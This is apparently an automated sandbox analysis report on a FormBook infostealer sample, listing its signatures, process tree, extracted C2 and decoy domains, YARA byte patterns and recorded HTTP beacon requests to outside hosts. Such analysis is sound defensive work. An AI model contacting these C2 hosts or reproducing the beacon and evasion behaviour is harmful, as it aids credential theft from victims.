Loading ...

Play interactive tourEdit tour

Windows Analysis Report Nuevo Pedido.exe

Overview

General Information

Sample Name:Nuevo Pedido.exe
Analysis ID:528617
MD5:159c46c59cd8ecb7a2bce707de1bc370
SHA1:e76f6dc42b06e706b6ce49cf6c95c9eaabfc9334
SHA256:7f91403a34cde3f8a1d3a30a2cec9abfb30f5f7eb52f777af78fa0d34f7a27f9
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Nuevo Pedido.exe (PID: 6320 cmdline: "C:\Users\user\Desktop\Nuevo Pedido.exe" MD5: 159C46C59CD8ECB7A2BCE707DE1BC370)
    • Nuevo Pedido.exe (PID: 6464 cmdline: C:\Users\user\Desktop\Nuevo Pedido.exe MD5: 159C46C59CD8ECB7A2BCE707DE1BC370)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 6536 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6420 cmdline: /c del "C:\Users\user\Desktop\Nuevo Pedido.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 34 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.0.Nuevo Pedido.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.0.Nuevo Pedido.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.0.Nuevo Pedido.exe.400000.8.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dec:$sqlite3step: 68 34 1C 7B E1
        • 0x15d08:$sqlite3text: 68 38 2A 90 C5
        • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Nuevo Pedido.exe.2dd8e9c.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          3.0.Nuevo Pedido.exe.400000.8.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 18 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: Nuevo Pedido.exeVirustotal: Detection: 32%Perma Link
            Source: Nuevo Pedido.exeReversingLabs: Detection: 33%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: Nuevo Pedido.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: Nuevo Pedido.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: Nuevo Pedido.exe, Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
            Source: Binary string: cscript.pdb source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 4x nop then pop edi3_2_00415660
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 4x nop then pop esi3_2_004157D8
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 4x nop then pop esi3_2_004157AA
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi16_2_00615660
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop esi16_2_006157D8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop esi16_2_006157AA

            Networking:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.rcepjobs.com
            Source: C:\Windows\explorer.exeDomain query: www.sosibibyslot.website
            Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.91 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.tremblock.com
            Source: C:\Windows\explorer.exeDomain query: www.securebankofamericalog.site
            Source: C:\Windows\explorer.exeDomain query: www.thejohnmatt.com
            Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.blueprintroslyn.com
            Source: C:\Windows\explorer.exeDomain query: www.onlinedatingthaiweb.com
            Source: C:\Windows\explorer.exeNetwork Connect: 192.232.250.147 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 185.53.178.53 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.downingmunroe.online
            Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80Jump to behavior
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.spoiledzone.com/udeh/
            Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN HTTP/1.1Host: www.tremblock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN HTTP/1.1Host: www.rcepjobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN HTTP/1.1Host: www.downingmunroe.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN HTTP/1.1Host: www.thejohnmatt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN HTTP/1.1Host: www.onlinedatingthaiweb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 3.64.163.50 3.64.163.50
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 25 Nov 2021 14:10:30 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 25 Nov 2021 14:11:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: cscript.exe, 00000010.00000002.508075136.0000000004E02000.00000004.00020000.sdmpString found in binary or memory: http://www.rcepjobs.com
            Source: unknownDNS traffic detected: queries for: www.tremblock.com
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN HTTP/1.1Host: www.tremblock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN HTTP/1.1Host: www.rcepjobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN HTTP/1.1Host: www.downingmunroe.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN HTTP/1.1Host: www.thejohnmatt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN HTTP/1.1Host: www.onlinedatingthaiweb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
